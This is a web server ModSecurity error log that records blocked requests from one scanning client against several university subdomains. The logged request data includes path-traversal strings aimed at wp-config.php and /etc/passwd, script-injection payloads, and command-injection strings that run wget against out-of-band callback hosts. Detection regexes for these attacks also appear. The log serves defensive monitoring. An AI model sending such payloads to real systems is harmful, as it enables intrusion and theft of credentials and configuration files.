[Tue Aug 29 11:41:41.988730 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BcCo-f0AAAc0Nk8AAAAM"]
[Tue Aug 29 11:41:42.699374 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAUKhMMAAABC"]
[Tue Aug 29 11:41:42.896729 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAUKhMwAAABC"]
[Tue Aug 29 11:41:42.896729 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcoNcsAAAAF"]
[Tue Aug 29 11:41:42.908517 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAc8A4sAAAAK"]
[Tue Aug 29 11:41:42.916436 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcoNcwAAAAF"]
[Tue Aug 29 11:41:43.786451 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13B8Co-f0AAAUKhNsAAABC"]
[Tue Aug 29 11:41:45.392399 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26g1pqb47tahd7iu.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAQkBiUAAAAC"]
[Tue Aug 29 11:41:45.435135 2023] [:error] [pid 1859] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gdsqsbtynr1mys.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdDO1gAAAAV"]
[Tue Aug 29 11:41:45.441209 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26g3551a35pmoopu.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAc8A5QAAAAK"]
[Tue Aug 29 11:41:45.495652 2023] [:error] [pid 1859] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gn4zakgcan6xwy.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdDO1kAAAAV"]
[Tue Aug 29 11:41:45.656632 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gdzxgmz3hozn6s.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAUKhOoAAABC"]
[Tue Aug 29 11:41:46.376886 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gex8d9n51pq4ga.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13CsCo-f0AAAc92rQAAAAD"]
[Tue Aug 29 11:41:46.396327 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAcqJUAAAAAG"]
[Tue Aug 29 11:41:46.420298 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAc0NlwAAAAM"]
[Tue Aug 29 11:41:46.427277 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAQSWtIAAAA0"]
[Tue Aug 29 11:41:46.501187 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAc92rkAAAAD"]
[Tue Aug 29 11:41:46.553544 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAc0Nl8AAAAM"]
[Tue Aug 29 11:41:47.400830 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13C8Co-f0AAAUKhPEAAABC"]
[Tue Aug 29 11:41:49.383084 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAdECUkAAAAW"]
[Tue Aug 29 11:41:49.387304 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAXHqGEAAAAT"]
[Tue Aug 29 11:41:49.397198 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAc-5vQAAAAN"]
[Tue Aug 29 11:41:49.472560 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAXHqGMAAAAT"]
[Tue Aug 29 11:41:49.552707 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAXHqGYAAAAT"]
[Tue Aug 29 11:41:50.565201 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DsCo-f0AAAQkBjUAAAAC"]
[Tue Aug 29 11:41:56.378322 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdJqQIAAAAC"]
[Tue Aug 29 11:41:56.393616 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdECXQAAAAW"]
[Tue Aug 29 11:41:56.405038 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdOeNIAAAAS"]
[Tue Aug 29 11:41:56.425429 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAcvBggAAAAJ"]
[Tue Aug 29 11:41:56.472868 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdOeNUAAAAS"]
[Tue Aug 29 11:41:57.424858 2023] [:error] [pid 1878] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdW2X4AAAAb"]
